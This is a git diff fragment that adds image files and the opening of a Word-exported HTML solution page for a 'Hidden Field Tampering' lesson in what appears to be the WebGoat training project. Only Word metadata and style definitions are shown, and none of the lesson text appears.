new file mode 100644
index 000000000..11a7001dc
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ForgotPassword_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/ForgotPassword_files/image005.png b/main/project/WebContent/lesson_solutions/ForgotPassword_files/image005.png
new file mode 100644
index 000000000..033f2e8c8
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ForgotPassword_files/image005.png differ
diff --git a/main/project/WebContent/lesson_solutions/ForgotPassword_files/image007.png b/main/project/WebContent/lesson_solutions/ForgotPassword_files/image007.png
new file mode 100644
index 000000000..664c24a06
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ForgotPassword_files/image007.png differ
diff --git a/main/project/WebContent/lesson_solutions/ForgotPassword_files/image009.png b/main/project/WebContent/lesson_solutions/ForgotPassword_files/image009.png
new file mode 100644
index 000000000..e0e2ffb7c
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ForgotPassword_files/image009.png differ
diff --git a/main/project/WebContent/lesson_solutions/ForgotPassword_files/image011.png b/main/project/WebContent/lesson_solutions/ForgotPassword_files/image011.png
new file mode 100644
index 000000000..4542c5240
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ForgotPassword_files/image011.png differ
diff --git a/main/project/WebContent/lesson_solutions/ForgotPassword_files/image013.png b/main/project/WebContent/lesson_solutions/ForgotPassword_files/image013.png
new file mode 100644
index 000000000..f72055656
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ForgotPassword_files/image013.png differ
diff --git a/main/project/WebContent/lesson_solutions/ForgotPassword_files/image015.jpg b/main/project/WebContent/lesson_solutions/ForgotPassword_files/image015.jpg
new file mode 100644
index 000000000..1f670723b
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ForgotPassword_files/image015.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/ForgotPassword_files/image016.jpg b/main/project/WebContent/lesson_solutions/ForgotPassword_files/image016.jpg
new file mode 100644
index 000000000..6f8105ce7
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ForgotPassword_files/image016.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/ForgotPassword_files/image017.jpg b/main/project/WebContent/lesson_solutions/ForgotPassword_files/image017.jpg
new file mode 100644
index 000000000..76540dad8
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ForgotPassword_files/image017.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/ForgotPassword_files/image018.jpg b/main/project/WebContent/lesson_solutions/ForgotPassword_files/image018.jpg
new file mode 100644
index 000000000..76c23e5ea
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ForgotPassword_files/image018.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/ForgotPassword_files/image019.jpg b/main/project/WebContent/lesson_solutions/ForgotPassword_files/image019.jpg
new file mode 100644
index 000000000..fc38db81d
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ForgotPassword_files/image019.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/ForgotPassword_files/image020.jpg b/main/project/WebContent/lesson_solutions/ForgotPassword_files/image020.jpg
new file mode 100644
index 000000000..c5a2f719f
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ForgotPassword_files/image020.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/ForgotPassword_files/image021.jpg b/main/project/WebContent/lesson_solutions/ForgotPassword_files/image021.jpg
new file mode 100644
index 000000000..5798c0713
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ForgotPassword_files/image021.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/ForgotPassword_files/themedata.thmx b/main/project/WebContent/lesson_solutions/ForgotPassword_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/ForgotPassword_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/HiddenFieldTampering.html b/main/project/WebContent/lesson_solutions/HiddenFieldTampering.html
new file mode 100644
index 000000000..5dc07bcae
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/HiddenFieldTampering.html
@@ -0,0 +1,685 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/HiddenFieldTampering_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/HiddenFieldTampering_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>5</o:Revision>
+  <o:TotalTime>13</o:TotalTime>
+  <o:Created>2007-07-11T10:36:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:33:00Z</o:LastSaved>
+  <o:Pages>2</o:Pages>
+  <o:Words>190</o:Words>
+  <o:Characters>1088</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>9</o:Lines>
+  <o:Paragraphs>2</o:Paragraphs>
+  <o:CharactersWithSpaces>1276</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/HiddenFieldTampering_files/themedata.thmx">
+<link rel=colorSchemeMapping
+href="/WebGoat/lesson_solutions/HiddenFieldTampering_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:612.0pt 792.0pt;
+	margin:72.0pt 72.0pt 72.0pt 72.0pt;
+	mso-header-margin:35.4pt;
+	mso-footer-margin:35.4pt;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="4098"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
